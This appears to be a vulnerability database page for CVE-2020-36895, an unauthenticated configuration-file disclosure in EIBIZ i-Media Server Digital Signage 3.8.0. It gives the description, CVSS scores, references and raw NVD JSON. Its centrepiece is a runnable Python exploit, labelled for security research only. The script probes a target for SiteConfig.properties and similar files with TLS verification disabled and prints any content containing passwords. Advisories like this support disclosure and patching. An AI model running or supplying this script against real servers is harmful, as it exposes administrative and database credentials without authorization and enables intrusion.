CVE-2020-36895

Description

EIBIZ i-Media Server Digital Signage 3.8.0 contains an unauthenticated configuration disclosure vulnerability that allows remote attackers to access sensitive configuration files via direct object reference. Attackers can retrieve the SiteConfig.properties file through an HTTP GET request, exposing administrative credentials, database connection details, and system configuration information.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:eibiz:i-media_server_digital_signage:3.8.0:*:*:*:*:*:*:* - VULNERABLE

EIBIZ i-Media Server Digital Signage 3.8.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2020-36895 PoC - Unauthenticated Configuration Disclosure
# Target: EIBIZ i-Media Server Digital Signage 3.8.0

def exploit_cve_2020_36895(target_url):
    """
    Exploit for CVE-2020-36895
    Unauthenticated configuration file disclosure vulnerability
    """
    # Common paths for configuration file disclosure
    paths = [
        '/SiteConfig.properties',
        '/config/SiteConfig.properties',
        '/WEB-INF/SiteConfig.properties',
        '/admin/SiteConfig.properties',
        '/config.properties',
        '/application.properties'
    ]
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2020-36895...\n")
    
    for path in paths:
        url = target_url.rstrip('/') + path
        try:
            response = requests.get(url, timeout=10, verify=False)
            if response.status_code == 200 and 'password' in response.text.lower():
                print(f"[+] Found exposed configuration at: {url}")
                print(f"[+] Status Code: {response.status_code}")
                print(f"[+] Content Length: {len(response.text)}")
                print(f"\n[+] Configuration Content:\n")
                print(response.text)
                return response.text
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")
    
    print("[-] No vulnerable configuration endpoints found")
    return None

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com:8080")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_cve_2020_36895(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-36895
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-36895
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-36895/
[4] VulDB https://vuldb.com/cve/CVE-2020-36895
[5] http://www.eibiz.co.th
[6] https://www.exploit-db.com/exploits/48764
[7] https://www.vulncheck.com/advisories/eibiz-i-media-server-digital-signage-unauthenticated-configuration-disclosure
[8] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5583.php
[9] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5583.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-36895", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:01.900", "lastModified": "2025-12-17T19:22:45.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EIBIZ i-Media Server Digital Signage 3.8.0 contains an unauthenticated configuration disclosure vulnerability that allows remote attackers to access sensitive configuration files via direct object reference. Attackers can retrieve the SiteConfig.properties file through an HTTP GET request, exposing administrative credentials, database connection details, and system configuration information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eibiz:i-media_server_digital_signage:3.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "CA26876B-8687-490C-A16D-551C7E04A425"}]}]}], "references": [{"url": "http://www.eibiz.co.th", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.exploit-db.com/exploits/48764", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/eibiz-i-media-server-digital-signage-unauthenticated-configuration-disclosure", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5583.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5583.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}